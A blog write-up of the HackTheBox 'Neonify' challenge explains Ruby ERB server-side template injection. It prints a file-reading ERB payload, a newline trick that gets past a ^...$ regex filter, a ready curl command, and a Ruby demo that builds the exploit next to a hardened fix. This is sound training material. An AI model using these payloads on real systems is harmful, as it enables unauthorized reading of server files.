Server Side Template Injection (SSTI) Explained | HackTheBox Neonify

Motasem Hamdan
1 min read · Dec 28, 2023

We covered the Server Side Template Injection (SSTI) vulnerability and demonstrated a practical scenario using the HackTheBox Neonify web challenge. SSTI is a server-side vulnerability in which user input is passed directly into the template engine as template source, without validation, so the engine compiles and executes whatever template code the input contains. In the example we covered, the code applied a regular-expression filter to rule out bad characters. The filter anchored its pattern with ^ and $; in Ruby those anchors match at line boundaries rather than at the start and end of the whole string, so a value whose first line is clean passes even when a later line carries the payload. We therefore prefixed the ERB payload with a newline character, URL-encoded it, and the rendered response revealed the flag contents.

CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this ERB (Ruby) SSTI payload to read and reveal sensitive files, here flag.txt:
  • <%= File.open('flag.txt').read %>
  • The payload must be prefixed with a newline character and URL-encoded before it is sent as the neon parameter; the newline is what gets it past the ^...$ regex filter.

An example request can be sent with curl using the command below to reveal the flag. The newline is sent URL-encoded as %0A (a literal newline inside the single quotes works as well, since curl -d sends the data as given), and ip:port is the address of the challenge instance.

curl -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' ip:port
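As an added illustration (this is not the challenge's source code and not code from the post): a small Ruby model of the vulnerable pattern next to a hardened version, run end to end against the same encoded request. The ^...$ filter regex, the 'Malformed Input' message and the <h1 class="neon"> wrapper are assumptions; the neon parameter name and the payload shape are the ones used above. The flag file is a constructed Tempfile standing in for flag.txt, so the script runs offline.

```ruby
require 'erb'
require 'cgi'
require 'uri'
require 'tempfile'

# Assumed reconstruction of the challenge's filter (the exact pattern is not on
# the page). In Ruby, ^ and $ match at LINE boundaries, so only the first line
# of a multi-line value has to be clean.
WEAK_FILTER   = /^[0-9A-Za-z ]+$/
# \A and \z anchor to the start and end of the whole string.
STRICT_FILTER = /\A[0-9A-Za-z ]+\z/

def weak_filter_passes?(neon)
  neon.match?(WEAK_FILTER)
end

def strict_filter_passes?(neon)
  neon.match?(STRICT_FILTER)
end

# Vulnerable pattern: user text is spliced into the ERB *source*, so any
# <%= ... %> it contains is compiled and executed server-side.
# The wrapper markup and the 'Malformed Input' message are assumptions.
def render_vulnerable(neon)
  raise ArgumentError, 'Malformed Input' unless weak_filter_passes?(neon)
  ERB.new("<h1 class=\"neon\">#{neon}</h1>").result(binding)
end

# Hardened pattern: whole-string anchors, a fixed template, and the user text
# supplied as data (HTML-escaped), never as template source.
def render_hardened(neon)
  raise ArgumentError, 'Malformed Input' unless strict_filter_passes?(neon)
  template = ERB.new('<h1 class="neon"><%= CGI.escapeHTML(text) %></h1>')
  template.result_with_hash(text: neon)
end

# Build the exploit value the post uses: a clean first line, a newline, then the
# ERB payload that reads a file. `path` is the file to read.
def build_payload(path)
  "a\n<%= File.open('#{path}').read %>"
end

# Form-encode the value as it travels in `curl -d` (the newline becomes %0A).
def encode_form(neon)
  URI.encode_www_form(neon: neon)
end

# Decode the body the way the server sees the `neon` parameter.
def decode_form(body)
  URI.decode_www_form(body).to_h['neon']
end

# End-to-end walk-through against a constructed flag file (stand-in for flag.txt).
# Returns the request body, the vulnerable response, and the hardened outcome.
def demo
  flag = Tempfile.new('flag')
  flag.write('HTB{constructed_example_flag}')
  flag.flush
  body = encode_form(build_payload(flag.path))
  neon = decode_form(body)
  vulnerable = render_vulnerable(neon)          # leaks the file contents
  hardened = begin
    render_hardened(neon)
  rescue ArgumentError => e
    e.message                                   # 'Malformed Input'
  end
  { body: body, neon: neon, vulnerable: vulnerable, hardened: hardened }
ensure
  flag&.close!
end

if $PROGRAM_NAME == __FILE__
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Two things make the hardened version safe, and both are needed: the \A...\z anchors reject the multi-line value outright, and even if a value did get through, the template is a fixed string and the user text only ever reaches it as a variable, so no ERB tag in the input is ever compiled.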

https://www.youtube.com/watch?v=Rc0JTdb7jLU


Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan
